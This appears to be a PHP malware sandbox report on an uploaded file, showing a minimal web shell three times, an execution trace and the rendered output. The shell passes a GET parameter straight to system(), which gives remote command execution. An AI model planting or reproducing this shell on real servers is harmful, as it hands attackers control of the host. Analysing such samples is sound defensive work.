Jump to:
Screenshot
Attributes
Execution
echo '<form method="get"> <input type="text" name="cm"> <button type="submit">Submit</button></form>';
if (isset($_GET['cm'])) {
echo system($_GET['cm']);
}
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:55:17.552652]
1 0 1 0.000187 393528
1 3 0 0.000231 393248 {main} 1 /var/www/html/uploads/00000000ax.php 0 0
1 3 1 0.000248 393248
0.000272 314240
TRACE END [2023-02-12 19:55:17.552821]
<html><head></head><body>echo '<form method="get"> <input type="text" name="cm"> <button type="submit">Submit</button></form>';
if (isset($_GET['cm'])) {
echo system($_GET['cm']);
}</body></html>
echo '<form method="get"> <input type="text" name="cm"> <button type="submit">Submit</button></form>';
if (isset($_GET['cm'])) {
echo system($_GET['cm']);
}